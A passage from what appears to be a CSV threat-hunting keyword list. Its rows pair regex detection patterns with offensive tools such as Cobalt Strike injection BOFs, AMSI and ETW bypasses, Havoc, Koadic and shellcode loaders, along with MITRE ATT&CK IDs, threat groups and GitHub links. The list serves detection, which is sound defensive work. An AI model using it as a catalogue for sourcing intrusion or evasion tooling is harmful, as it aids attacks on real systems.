- T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","1","N/A","N/A","1","88","6","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "*/imperun * *cmd.exe /c whoami*",".{0,1000}\/imperun\s.{0,1000}\s.{0,1000}cmd\.exe\s\/c\swhoami.{0,1000}","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","117","14","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*/Imperva_gzip_WAF_Bypass*",".{0,1000}\/Imperva_gzip_WAF_Bypass.{0,1000}","offensive_tool_keyword","Imperva_gzip_WAF_Bypass","Imperva Cloud WAF was vulnerable to a bypass that allows attackers to evade WAF rules when sending malicious HTTP POST payloads. such as log4j exploits. SQL injection. command execution. directory traversal. XXE. etc.","T1190 - T1210 - T1506 - T1061 - T1071 - T1100 - T1220","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/BishopFox/Imperva_gzip_WAF_Bypass","1","1","N/A","N/A","2","150","29","2022-01-07T17:39:29Z","2022-01-07T17:38:33Z" "*/implant/callback*",".{0,1000}\/implant\/callback.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*/implant/elevate/*",".{0,1000}\/implant\/elevate\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/implant/register_cmd*",".{0,1000}\/implant\/register_cmd.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*/implants/*/Syscalls.*",".{0,1000}\/implants\/.{0,1000}\/Syscalls\..{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/ImplantSSP.exe*",".{0,1000}\/ImplantSSP\.exe.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/impress-remote-discover.nse*",".{0,1000}\/impress\-remote\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/inceptor.git*",".{0,1000}\/inceptor\.git.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*/inceptor.git*",".{0,1000}\/inceptor\.git.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*/include/KaynStrike.h*",".{0,1000}\/include\/KaynStrike\.h.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","9","4","382","60","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z" "*/infection_monkey/*",".{0,1000}\/infection_monkey\/.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*/InflativeLoading.git*",".{0,1000}\/InflativeLoading\.git.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*/InflativeLoading.py*",".{0,1000}\/InflativeLoading\.py.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*/InflativeLoading-main.zip*",".{0,1000}\/InflativeLoading\-main\.zip.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*/Infoga*",".{0,1000}\/Infoga.{0,1000}","offensive_tool_keyword","Infoga","Email Information Gathering.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/m4ll0k/Infoga","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" "*/informix-brute.nse*",".{0,1000}\/informix\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/informix-query.nse*",".{0,1000}\/informix\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/informix-tables.nse*",".{0,1000}\/informix\-tables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/inject.cpp*",".{0,1000}\/inject\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/Inject/Dll/LoadDll*",".{0,1000}\/Inject\/Dll\/LoadDll.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/Inject/PE/*.cs*",".{0,1000}\/Inject\/PE\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/Inject/ShellCode/*.cs*",".{0,1000}\/Inject\/ShellCode\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/injectAmsiBypass/*",".{0,1000}\/injectAmsiBypass\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","366","68","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" "*/inject-assembly/*",".{0,1000}\/inject\-assembly\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","467","73","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*/injectEtw.*",".{0,1000}\/injectEtw\..{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","10","10","271","54","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z" "*/Injection/clipboard/*",".{0,1000}\/Injection\/clipboard\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/conhost/*",".{0,1000}\/Injection\/conhost\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/createremotethread/*",".{0,1000}\/Injection\/createremotethread\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/ctray/*",".{0,1000}\/Injection\/ctray\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/dde/*",".{0,1000}\/Injection\/dde\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/Injection.cna*",".{0,1000}\/Injection\/Injection\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/kernelcallbacktable*",".{0,1000}\/Injection\/kernelcallbacktable.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/ntcreatethread*",".{0,1000}\/Injection\/ntcreatethread.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/ntcreatethread/*",".{0,1000}\/Injection\/ntcreatethread\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Injection/ntqueueapcthread*",".{0,1000}\/Injection\/ntqueueapcthread.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 